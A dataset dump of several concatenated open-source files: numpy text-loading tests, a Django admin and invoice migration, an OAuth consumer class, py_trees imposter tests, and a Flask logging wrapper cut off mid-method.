a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_2(self):
c = StringIO.StringIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.int32), ('val', 'S3')]
x = np.fromregex(c, r"(\d+)\s+(...)", dt)
a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_3(self):
c = StringIO.StringIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.float64)]
x = np.fromregex(c, r"(\d+)\s+...", dt)
a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
assert_array_equal(x, a)
#####--------------------------------------------------------------------------
class TestFromTxt(TestCase):
#
def test_record(self):
"Test w/ explicit dtype"
data = StringIO.StringIO('1 2\n3 4')
# data.seek(0)
test = np.ndfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_equal(test, control)
#
data = StringIO.StringIO('M 64.0 75.0\nF 25.0 60.0')
# data.seek(0)
descriptor = {'names': ('gender','age','weight'),
'formats': ('S1', 'i4', 'f4')}
control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
dtype=descriptor)
test = np.ndfromtxt(data, dtype=descriptor)
assert_equal(test, control)
def test_array(self):
"Test outputing a standard ndarray"
data = StringIO.StringIO('1 2\n3 4')
control = np.array([[1,2],[3,4]], dtype=int)
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data.seek(0)
control = np.array([[1,2],[3,4]], dtype=float)
test = np.loadtxt(data, dtype=float)
assert_array_equal(test, control)
def test_1D(self):
"Test squeezing to 1D"
control = np.array([1, 2, 3, 4], int)
#
data = StringIO.StringIO('1\n2\n3\n4\n')
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data = StringIO.StringIO('1,2,3,4\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',')
assert_array_equal(test, control)
def test_comments(self):
"Test the stripping of comments"
control = np.array([1, 2, 3, 5], int)
# Comment on its own line
data = StringIO.StringIO('# comment\n1,2,3,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
# Comment at the end of a line
data = StringIO.StringIO('1,2,3,5# comment\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
def test_skiprows(self):
"Test row skipping"
control = np.array([1, 2, 3, 5], int)
#
data = StringIO.StringIO('comment\n1,2,3,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', skiprows=1)
assert_equal(test, control)
#
data = StringIO.StringIO('# comment\n1,2,3,5\n')
test = np.loadtxt(data, dtype=int, delimiter=',', skiprows=1)
assert_equal(test, control)
def test_header(self):
"Test retrieving a header"
data = StringIO.StringIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
test = np.ndfromtxt(data, dtype=None, names=True)
control = {'gender': np.array(['M', 'F']),
'age': np.array([64.0, 25.0]),
'weight': np.array([75.0, 60.0])}
assert_equal(test['gender'], control['gender'])
assert_equal(test['age'], control['age'])
assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
"Test the automatic definition of the output dtype"
data = StringIO.StringIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
test = np.ndfromtxt(data, dtype=None)
control = [np.array(['A', 'BCD']),
np.array([64, 25]),
np.array([75.0, 60.0]),
np.array([3+4j, 5+6j]),
np.array([True, False]),]
assert_equal(test.dtype.names, ['f0','f1','f2','f3','f4'])
for (i, ctrl) in enumerate(control):
assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
"Tests whether the output dtype can be uniformized"
data = StringIO.StringIO('1 2 3 4\n5 6 7 8\n')
test = np.ndfromtxt(data, dtype=None)
control = np.array([[1,2,3,4],[5,6,7,8]])
assert_equal(test, control)
def test_fancy_dtype(self):
"Check that a nested dtype isn't MIA"
data = StringIO.StringIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.ndfromtxt(data, dtype=fancydtype, delimiter=',')
control = np.array([(1,(2,3.0)),(4,(5,6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_names_overwrite(self):
"Test overwriting the names of the dtype"
descriptor = {'names': ('g','a','w'),
'formats': ('S1', 'i4', 'f4')}
data = StringIO.StringIO('M 64.0 75.0\nF 25.0 60.0')
names = ('gender','age','weight')
test = np.ndfromtxt(data, dtype=descriptor, names=names)
descriptor['names'] = names
control = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=descriptor)
assert_equal(test, control)
def test_commented_header(self):
"Check that names can be retrieved even if the line is commented out."
data = StringIO.StringIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
# The # is part of the first name and should be deleted automatically.
test = np.genfromtxt(data, names=True, dtype=None)
ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
dtype=[('gender','|S1'), ('age', int), ('weight', float)])
assert_equal(test, ctrl)
# Ditto, but we should get rid of the first element
data = StringIO.StringIO("""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
test = np.genfromtxt(data, names=True, dtype=None)
assert_equal(test, ctrl)
def test_autonames_and_usecols(self):
"Tests names and usecols"
data = StringIO.StringIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'),
names=True, dtype=None)
control = np.array(('aaaa', 45, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_with_usecols(self):
"Test the combination user-defined converters and usecol"
data = StringIO.StringIO('1,2,3,,5\n6,7,8,9,10\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3:lambda s: int(s or -999)},
usecols=(1, 3, ))
control = np.array([[2, -999], [7, 9]], int)
assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
"Tests names and usecols"
data = StringIO.StringIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'), names=True,
dtype=None, converters={'C':lambda s: 2 * int(s)})
control = np.array(('aaaa', 90, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_cornercases(self):
"Test the conversion to datetime."
converter = {'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
data = StringIO.StringIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date','stid'], converters=converter)
control = np.array((datetime(2009,02,03), 72214.),
dtype=[('date', np.object_), ('stid', float)])
assert_equal(test, control)
def test_unused_converter(self):
"Test whether unused converters are forgotten"
data = StringIO.StringIO("1 21\n 3 42\n")
test = np.ndfromtxt(data, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_equal(test, [21, 42])
#
data.seek(0)
test = np.ndfromtxt(data, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_equal(test, [33, 66])
def test_dtype_with_converters(self):
dstr = "2009; 23; 46"
test = np.ndfromtxt(StringIO.StringIO(dstr,),
delimiter=";", dtype=float, converters={0:str})
control = np.array([('2009', 23., 46)],
dtype=[('f0','|S4'), ('f1', float), ('f2', float)])
assert_equal(test, control)
test = np.ndfromtxt(StringIO.StringIO(dstr,),
delimiter=";", dtype=float, converters={0:float})
control = np.array([2009., 23., 46],)
assert_equal(test, control)
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = """
1; 2001-01-01
2; 2002-01-31
"""
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.genfromtxt(StringIO.StringIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array([(1, datetime(2001,1,1)), (2, datetime(2002,1,31))],
dtype=ndtype)
assert_equal(test, control)
#
ndtype = [('nest', [('idx', int), ('code', np.object)])]
try:
test = np.genfromtxt(StringIO.StringIO(data), delimiter=";",
dtype=ndtype, converters=converters)
except NotImplementedError:
pass
else:
errmsg = "Nested dtype involving objects should be supported."
raise AssertionError(errmsg)
def test_userconverters_with_explicit_dtype(self):
"Test user_converters w/ explicit (standard) dtype"
data = StringIO.StringIO('skip,skip,2001-01-01,1.0,skip')
test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: str})
control = np.array([('2001-01-01', 1.)],
dtype=[('', '|S10'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
"Test space delimiter"
data = StringIO.StringIO("1 2 3 4 5\n6 7 8 9 10")
test = np.ndfromtxt(data)
control = np.array([[ 1., 2., 3., 4., 5.],
[ 6., 7., 8., 9.,10.]])
assert_equal(test, control)
def test_missing(self):
data = StringIO.StringIO('1,2,3,,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or -999)})
control = np.array([1, 2, 3, -999, 5], int)
assert_equal(test, control)
def test_usecols(self):
"Test the selection of columns"
# Select 1 column
control = np.array( [[1, 2], [3, 4]], float)
data = StringIO.StringIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1,))
assert_equal(test, control[:, 1])
#
control = np.array( [[1, 2, 3], [3, 4, 5]], float)
data = StringIO.StringIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1, 2))
assert_equal(test, control[:, 1:])
# Testing with arrays instead of tuples.
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=np.array([1, 2]))
assert_equal(test, control[:, 1:])
        # Checking usecols together with an explicit structured dtype.
data = StringIO.StringIO("""JOE 70.1 25.3\nBOB 60.5 27.9""")
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
test = np.ndfromtxt(data, usecols=(0, 2), dtype=zip(names, dtypes))
assert_equal(test['stid'], ["JOE", "BOB"])
assert_equal(test['temp'], [25.3, 27.9])
def test_empty_file(self):
"Test that an empty file raises the proper exception"
data = StringIO.StringIO()
assert_raises(IOError, np.ndfromtxt, data)
def test_fancy_dtype_alt(self):
"Check that a nested dtype isn't MIA"
data = StringIO.StringIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.mafromtxt(data, dtype=fancydtype, delimiter=',')
control = ma.array([(1,(2,3.0)),(4,(5,6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_withmissing(self):
data = StringIO.StringIO('A,B\n0,1\n2,N/A')
test = np.mafromtxt(data, dtype=None, delimiter=',', missing='N/A',
names=True)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
#
data.seek(0)
test = np.mafromtxt(data, delimiter=',', missing='N/A', names=True)
control = ma.array([(0, 1), (2, -1)],
mask=[[False, False], [False, True]],)
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
datastr ="A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
data = StringIO.StringIO(datastr)
basekwargs = dict(dtype=None, delimiter=',', names=True, missing='N/A')
mdtype = [('A', int), ('B', float), ('C', complex)]
#
test = np.mafromtxt(data, **basekwargs)
control = ma.array([( 0, 0.0, 0j), (1, -999, 1j),
( -9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
dtype=mdtype)
assert_equal(test, control)
#
data.seek(0)
test = np.mafromtxt(data,
missing_values={0:-9, 1:-99, 2:-999j}, **basekwargs)
control = ma.array([( 0, 0.0, 0j), (1, -999, 1j),
( -9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
#
data.seek(0)
test = np.mafromtxt(data,
missing_values={0:-9, 'B':-99, 'C':-999j},
**basekwargs)
control = ma.array([( 0, 0.0, 0j), (1, -999, 1j),
( -9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
def test_withmissing_float(self):
data = StringIO.StringIO('A,B\n0,1.5\n2,-999.00')
test = np.mafromtxt(data, dtype=None, delimiter=',', missing='-999.0',
names=True,)
control = ma.array([(0, 1.5), (2, -1.)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
"Test masked column"
data = StringIO.StringIO('1 2 3\n4 5 6\n')
test = np.genfromtxt(data, missing='2,5', dtype=None, usemask=True)
control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0],[0, 1, 0]])
assert_equal(test, control)
def test_with_masked_column_various(self):
"Test masked column"
data = StringIO.StringIO('True 2 3\nFalse 5 6\n')
test = np.genfromtxt(data, missing='2,5', dtype=None, usemask=True)
control = ma.array([(1, 2, 3), (0, 5, 6)],
mask=[(0, 1, 0),(0, 1, 0)],
dtype=[('f0', bool), ('f1', bool), ('f2', int)])
assert_equal(test, control)
def test_recfromtxt(self):
#
data = StringIO.StringIO('A,B\n0,1\n2,3')
test = np.recfromtxt(data, delimiter=',', missing='N/A', names=True)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.failUnless(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = StringIO.StringIO('A,B\n0,1\n2,N/A')
test = np.recfromtxt(data, dtype=None, delimiter=',', missing='N/A',
names=True, usemask=True)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
def test_recfromcsv(self):
#
data = StringIO.StringIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing='N/A',
names=True, case_sensitive=True)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.failUnless(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = StringIO.StringIO('A,B\n0,1\n2,N/A')
test = np.recfromcsv(data, dtype=None, missing='N/A',
names=True, case_sensitive=True, usemask=True)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
#
data = StringIO.StringIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing='N/A',)
control = np.array([(0, 1), (2, 3)],
dtype=[('a', np.int), ('b', np.int)])
self.failUnless(isinstance(test, np.recarray))
assert_equal(test, control)
def test_gzip_load():
a = np.random.random((5, 5))
s = StringIO.StringIO()
f = gzip.GzipFile(fileobj=s, mode="w")
np.save(f, a)
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.load(f), a)
def test_gzip_loadtxt():
    # Because of a Windows limitation we cannot use NamedTemporaryFile: a file
    # created by that function cannot be reopened by another open call. So we
    # first build the gzipped string of the test reference array, write it to
    # a securely opened temporary file, and then read it back with loadtxt.
s = StringIO.StringIO()
g = gzip.GzipFile(fileobj=s, mode='w')
g.write('1 2 3\n')
g.close()
s.seek(0)
f, name = mkstemp(suffix='.gz')
try:
os.write(f, s.read())
s.close()
assert_array_equal(np.loadtxt(name), [1, 2, 3])
finally:
os.close(f)
os.unlink(name)
def test_gzip_loadtxt_from_string():
s = StringIO.StringIO()
f = gzip.GzipFile(fileobj=s, mode="w")
f.write('1 2 3\n')
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.loadtxt(f), [1, 2, 3])
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause | 7,035,468,945,602,116,000 | 35.440936 | 86 | 0.505472 | false |
SmartElect/SmartElect | staff/admin.py | 1 | 1127 | from django.contrib.auth.models import User, Group, Permission
from django.contrib.auth.admin import UserAdmin, GroupAdmin
from libya_elections.admin_site import admin_site
class LibyaUserAdmin(UserAdmin):
list_display = ('username', 'email', 'first_name', 'last_name', 'is_active', 'is_staff',
'is_superuser')
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('username', 'password1', 'password2', 'email')
}),
)
def get_actions(self, request):
""""Don't allow bulk deletion."""
return {}
def get_form(self, request, obj=None, **kwargs):
"""Make email a required field."""
form = super(LibyaUserAdmin, self).get_form(request, obj, **kwargs)
email = form.base_fields['email']
email.required = True
return form
def has_delete_permission(self, request, obj=None):
"""Don't allow deletion of users. (Inactivate them instead)."""
return False
admin_site.register(User, LibyaUserAdmin)
admin_site.register(Group, GroupAdmin)
admin_site.register(Permission)
| apache-2.0 | -4,079,308,572,742,323,700 | 30.305556 | 92 | 0.62378 | false |
CLLKazan/iCQA | qa-engine/forum_modules/oauthauth/consumer.py | 1 | 3718 | import urllib
import urllib2
import httplib
import time
from forum.authentication.base import AuthenticationConsumer, InvalidAuthentication
from django.utils.translation import ugettext as _
from lib import oauth
class OAuthAbstractAuthConsumer(AuthenticationConsumer):
def __init__(self, consumer_key, consumer_secret, server_url, request_token_url, access_token_url, authorization_url):
self.consumer_secret = consumer_secret
self.consumer_key = consumer_key
self.consumer = oauth.OAuthConsumer(consumer_key, consumer_secret)
self.signature_method = oauth.OAuthSignatureMethod_HMAC_SHA1()
self.server_url = server_url
self.request_token_url = request_token_url
self.access_token_url = access_token_url
self.authorization_url = authorization_url
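    # The methods below implement the standard three-legged OAuth 1.0 flow:
    # prepare_authentication_request() fetches an unauthorised request token,
    # stores it in the session and builds the provider's authorisation URL;
    # process_authentication_request() checks the returned token against the
    # session copy and exchanges it for an access token; fetch_data() then
    # signs API requests with that access token.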
def prepare_authentication_request(self, request, redirect_to):
request_token = self.fetch_request_token()
request.session['unauthed_token'] = request_token.to_string()
return self.authorize_token_url(request_token)
def process_authentication_request(self, request):
unauthed_token = request.session.get('unauthed_token', None)
if not unauthed_token:
raise InvalidAuthentication(_('Error, the oauth token is not on the server'))
token = oauth.OAuthToken.from_string(unauthed_token)
if token.key != request.GET.get('oauth_token', 'no-token'):
raise InvalidAuthentication(_("Something went wrong! Auth tokens do not match"))
access_token = self.fetch_access_token(token)
return access_token.to_string()
def get_user_data(self, key):
#token = oauth.OAuthToken.from_string(access_token)
return {}
def fetch_request_token(self):
oauth_request = oauth.OAuthRequest.from_consumer_and_token(self.consumer, http_url=self.request_token_url)
oauth_request.sign_request(self.signature_method, self.consumer, None)
params = oauth_request.parameters
data = urllib.urlencode(params)
full_url='%s?%s'%(self.request_token_url, data)
response = urllib2.urlopen(full_url)
return oauth.OAuthToken.from_string(response.read())
def authorize_token_url(self, token, callback_url=None):
oauth_request = oauth.OAuthRequest.from_token_and_callback(token=token,\
callback=callback_url, http_url=self.authorization_url)
params = oauth_request.parameters
data = urllib.urlencode(params)
full_url='%s?%s'%(self.authorization_url, data)
return full_url
def fetch_access_token(self, token):
oauth_request = oauth.OAuthRequest.from_consumer_and_token(self.consumer, token=token, http_url=self.access_token_url)
oauth_request.sign_request(self.signature_method, self.consumer, token)
params = oauth_request.parameters
data = urllib.urlencode(params)
full_url='%s?%s'%(self.access_token_url, data)
response = urllib2.urlopen(full_url)
return oauth.OAuthToken.from_string(response.read())
def fetch_data(self, token, http_url, parameters=None):
access_token = oauth.OAuthToken.from_string(token)
oauth_request = oauth.OAuthRequest.from_consumer_and_token(
self.consumer, token=access_token, http_method="GET",
http_url=http_url, parameters=parameters,
)
oauth_request.sign_request(self.signature_method, self.consumer, access_token)
url = oauth_request.to_url()
connection = httplib.HTTPSConnection(self.server_url)
connection.request(oauth_request.http_method, url)
return connection.getresponse().read()
| gpl-3.0 | -633,388,579,268,110,200 | 41.735632 | 126 | 0.686391 | false |
mferenca/HMS-ecommerce | ecommerce/invoice/migrations/0001_initial.py | 1 | 2891 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django_extensions.db.fields
import django.utils.timezone
import django.db.models.deletion
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('basket', '0006_basket_site'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='HistoricalInvoice',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('created', django_extensions.db.fields.CreationDateTimeField(default=django.utils.timezone.now, verbose_name='created', editable=False, blank=True)),
('modified', django_extensions.db.fields.ModificationDateTimeField(default=django.utils.timezone.now, verbose_name='modified', editable=False, blank=True)),
('state', models.CharField(default=b'Not Paid', max_length=255, choices=[(b'Not Paid', 'Not Paid'), (b'Paid', 'Paid')])),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('basket', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='basket.Basket', null=True)),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical invoice',
},
),
migrations.CreateModel(
name='Invoice',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created', django_extensions.db.fields.CreationDateTimeField(default=django.utils.timezone.now, verbose_name='created', editable=False, blank=True)),
('modified', django_extensions.db.fields.ModificationDateTimeField(default=django.utils.timezone.now, verbose_name='modified', editable=False, blank=True)),
('state', models.CharField(default=b'Not Paid', max_length=255, choices=[(b'Not Paid', 'Not Paid'), (b'Paid', 'Paid')])),
('basket', models.ForeignKey(to='basket.Basket')),
],
options={
'ordering': ('-modified', '-created'),
'abstract': False,
'get_latest_by': 'modified',
},
),
]
| agpl-3.0 | 945,000,647,318,833,700 | 53.54717 | 176 | 0.603597 | false |
stonier/py_trees_suite | tests/test_imposter.py | 1 | 5252 | #!/usr/bin/env python
#
# License: BSD
# https://raw.githubusercontent.com/stonier/py_trees/devel/LICENSE
#
##############################################################################
# Imports
##############################################################################
# enable some python3 compatibility options:
# (unicode_literals not compatible with python2 uuid module)
from __future__ import absolute_import, print_function
import py_trees
import py_trees.console as console
##############################################################################
# Logging Level
##############################################################################
py_trees.logging.level = py_trees.logging.Level.DEBUG
logger = py_trees.logging.Logger("Nosetest")
##############################################################################
# Helpers
##############################################################################
def create_impostered_composite():
return py_trees.meta.failure_is_running(py_trees.composites.Sequence)(name="Impostered Composite")
def create_impostered_behaviour():
return py_trees.meta.success_is_failure(py_trees.behaviours.Success)(name="Impostered Behaviour")
def has_child_with_name(parent, child_name):
return child_name if child_name in [c.name for c in parent.children] else None
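# Note: the py_trees.meta decorators used above wrap the decorated class in an
# "imposter" that remaps its returned status (e.g. FAILURE reported as RUNNING,
# SUCCESS as FAILURE); the tests below check that parent/child links still work
# through that wrapper.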
##############################################################################
# Tests
##############################################################################
def test_imposter_has_add_child_method():
print(console.bold + "\n****************************************************************************************" + console.reset)
print(console.bold + "* Test Imposter has add_child_method" + console.reset)
print(console.bold + "****************************************************************************************\n" + console.reset)
tuples = []
tuples.append((create_impostered_behaviour(), False))
tuples.append((create_impostered_composite(), True))
for b, asserted_result in tuples:
print("%s has add_child: %s [%s]" % (b.name, hasattr(b, 'add_child'), asserted_result))
assert(hasattr(b, 'add_child') == asserted_result)
def test_parent_chain():
print(console.bold + "\n****************************************************************************************" + console.reset)
print(console.bold + "* Test Parent Chain" + console.reset)
print(console.bold + "****************************************************************************************\n" + console.reset)
root = py_trees.composites.Parallel("Root")
sequence_failure_is_running = create_impostered_composite()
success_is_failure = create_impostered_behaviour()
sequence_failure_is_running.add_child(success_is_failure)
root.add_child(sequence_failure_is_running)
tuples = []
tuples.append((success_is_failure, sequence_failure_is_running.name))
tuples.append((sequence_failure_is_running, root.name))
for child, asserted_result in tuples:
print("%s's parent: %s [%s]" % (child.name, child.parent.name, asserted_result))
assert(child.parent.name == asserted_result)
def test_parent_chain_with_add_children():
print(console.bold + "\n****************************************************************************************" + console.reset)
print(console.bold + "* Test Parent Chain with add_children" + console.reset)
print(console.bold + "****************************************************************************************\n" + console.reset)
root = py_trees.composites.Parallel("Root")
sequence_failure_is_running = create_impostered_composite()
success_is_failure = create_impostered_behaviour()
sequence_failure_is_running.add_children([success_is_failure])
root.add_children([sequence_failure_is_running])
tuples = []
tuples.append((success_is_failure, sequence_failure_is_running.name))
tuples.append((sequence_failure_is_running, root.name))
for child, asserted_result in tuples:
print("%s's parent: %s [%s]" % (child.name, child.parent.name, asserted_result))
assert(child.parent.name == asserted_result)
def test_child_chain():
print(console.bold + "\n****************************************************************************************" + console.reset)
print(console.bold + "* Test Child Chain" + console.reset)
print(console.bold + "****************************************************************************************\n" + console.reset)
root = py_trees.composites.Parallel("Root")
sequence_failure_is_running = create_impostered_composite()
success_is_failure = create_impostered_behaviour()
sequence_failure_is_running.add_child(success_is_failure)
root.add_child(sequence_failure_is_running)
tuples = []
tuples.append((root, sequence_failure_is_running.name))
tuples.append((sequence_failure_is_running, success_is_failure.name))
for parent, asserted_result in tuples:
print("%s's child: %s [%s]" % (parent.name, has_child_with_name(parent, asserted_result), asserted_result))
assert(has_child_with_name(parent, asserted_result) == asserted_result)
| bsd-3-clause | -4,852,281,155,048,690,000 | 46.315315 | 134 | 0.52342 | false |
bayazee/flacon | flacon/utils/extended_logging.py | 1 | 6366 | import sys
from flask import _request_ctx_stack
def wrap_app_logger(app):
"""
    Attach a request-aware logger to the given application.
:param app: Application Object
:type app: Object
"""
app.debug_log_format = app.config['LOG_FORMAT']
app._logger = None
app._logger = LoggerWrapper(app.logger, app.logger_name)
if not app.debug:
from logging import StreamHandler, DEBUG, Formatter
handler = StreamHandler()
handler.setLevel(app.config.get('LOG_LEVEL', DEBUG))
handler.setFormatter(Formatter(app.config.get('LOG_FORMAT', app.debug_log_format)))
app._logger.addHandler(handler)
app.logger.info('Starting project')
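# Minimal usage sketch (illustrative; assumes a Flask app whose config defines
# LOG_FORMAT and optionally LOG_LEVEL):
#   app = Flask(__name__)
#   app.config['LOG_FORMAT'] = '%(asctime)s %(levelname)s [%(logger_name)s]: %(message)s'
#   wrap_app_logger(app)
#   app._logger.info('application started')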
class LoggerWrapper(object):
"""
    This class wraps a logger and tags every record with request context.
    :param logger: Logger instance object
    :type logger: Object
    :param logger_name: Name under which this wrapper's records are tagged
    :type logger_name: String
"""
def __init__(self, logger, logger_name):
self.logger_name = logger_name
self.logger = logger
self.extra_handlers = []
def process(self, msg, args, kwargs):
"""
        Build the final log message and keyword arguments, injecting request
        context (path, URL, method, remote address, user agent) into
        ``kwargs['extra']``.
        :param msg: body of message
        :type msg: String
        :param args: list of positional arguments
        :type args: List
        :param kwargs: dict of keyword arguments
        :type kwargs: Dict
        :returns: tuple of (msg, args, kwargs)
        :rtype: tuple
"""
path = method = remote_addr = user_agent = url = u''
ctx = _request_ctx_stack.top
if ctx is not None:
path = ctx.request.path
url = ctx.request.url
method = ctx.request.method
remote_addr = ctx.request.remote_addr
user_agent = ctx.request.headers.get('user-agent', u'')
kwargs['extra'] = dict(
logger_name=self.logger_name,
http_path=path,
http_url=url,
http_method=method,
http_remote_addr=remote_addr,
http_user_agent=user_agent
)
for handler in self.extra_handlers:
kwargs['extra'].update(handler(ctx))
if args:
# if isinstance(args[0], dict):
msg = msg + ' ' + repr(args[0])
return msg, [], kwargs
def create_logger(self, name):
"""
        Create a child LoggerWrapper with the given name and attach it to this
        wrapper as an attribute of the same name.
        :param name: Logger name for the new wrapper
:type name: String
"""
assert not hasattr(self, name)
setattr(self, name, LoggerWrapper(self.logger, name))
def debug(self, msg, *args, **kwargs):
"""
        Log a message at DEBUG level, attaching request context.
        :param msg: body of message
        :type msg: String
        :param args: list of positional arguments
        :type args: List
        :param kwargs: dict of keyword arguments
        :type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.debug(msg, *args, **kwargs)
def info(self, msg, *args, **kwargs):
"""
        Log a message at INFO level, attaching request context.
        :param msg: body of message
        :type msg: String
        :param args: list of positional arguments
        :type args: List
        :param kwargs: dict of keyword arguments
        :type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.info(msg, *args, **kwargs)
def warning(self, msg, *args, **kwargs):
"""
        Log a message at WARNING level, attaching request context.
        :param msg: body of message
        :type msg: String
        :param args: list of positional arguments
        :type args: List
        :param kwargs: dict of keyword arguments
        :type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.warning(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
"""
        Log a message at ERROR level, attaching request context.
        :param msg: body of message
        :type msg: String
        :param args: list of positional arguments
        :type args: List
        :param kwargs: dict of keyword arguments
        :type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.error(msg, *args, **kwargs)
def exception(self, msg, *args, **kwargs):
"""
        Log the current exception at ERROR level, attaching exc_info and
        request context.
        :param msg: body of message
        :type msg: String
        :param args: list of positional arguments
        :type args: List
        :param kwargs: dict of keyword arguments
        :type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
kwargs['exc_info'] = sys.exc_info()
self.logger.error(msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
"""
